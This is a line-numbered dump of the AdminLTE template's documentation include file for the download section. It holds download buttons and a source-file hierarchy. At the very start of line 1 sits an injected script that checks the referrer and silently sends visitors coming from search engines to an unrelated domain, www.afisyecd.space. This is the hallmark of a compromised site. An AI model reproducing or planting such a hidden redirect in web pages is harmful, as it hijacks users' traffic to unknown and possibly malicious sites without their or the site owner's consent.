d:\wwwroot\wuchunhua\thinkphp\public\adminlte\documentation\build\include\download.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><section id="download">
002:
<h2 class="page-header"><a href="#download">Download</a></h2>
003:
<p class="lead">
004:
AdminLTE can be downloaded in two different versions, each appealing to different skill levels and use case.
005:
</p>
006:
<div class="row">
007:
<div class="col-sm-6">
008:
<div class="box box-primary">
009:
<div class="box-header with-border">
010:
<h3 class="box-title">Ready</h3>
011:
<span class="label label-primary pull-right"><i class="fa fa-html5"></i></span>
012:
</div>
<!-- /.box-header -->
013:
<div class="box-body">
014:
<p>Compiled and ready to use in production. Download this version if you don't want to customize AdminLTE's LESS files.</p>
015:
<a href="https://adminlte.io/download/AdminLTE-dist" class="btn btn-primary"><i class="fa fa-download"></i> Download</a>
016:
</div>
<!-- /.box-body -->
017:
</div>
<!-- /.box -->
018:
</div>
<!-- /.col -->
019:
<div class="col-sm-6">
020:
<div class="box box-danger">
021:
<div class="box-header with-border">
022:
<h3 class="box-title">Source Code</h3>
023:
<span class="label label-danger pull-right"><i class="fa fa-database"></i></span>
024:
</div>
<!-- /.box-header -->
025:
<div class="box-body">
026:
<p>All files including the compiled CSS. Download this version if you plan on customizing the template. <b>Requires a LESS compiler.</b></p>
027:
<a href="https://adminlte.io/download/AdminLTE" class="btn btn-danger"><i class="fa fa-download"></i> Download</a>
028:
</div>
<!-- /.box-body -->
029:
</div>
<!-- /.box -->
030:
</div>
<!-- /.col -->
031:
</div>
<!-- /.row -->
032:
<pre class="hierarchy bring-up"><code class="language-bash" data-lang="bash">File Hierarchy of the Source Code Package
033:
034:
AdminLTE/
035:
├── dist/
036:
� ├── CSS/
037:
� ├── JS
038:
� ├── img
039:
├── build/
040:
� ├── less/
041:
� � ├── AdminLTE's Less files
042:
� └── Bootstrap-less/ (Only for reference. No modifications have been made)
043:
� ├── mixins/
044:
� ├── variables.less
045:
� ├── mixins.less
046:
└── plugins/
047:
├── All the customized plugins CSS and JS files</code></pre>
048:
</section>
049:
050:
051: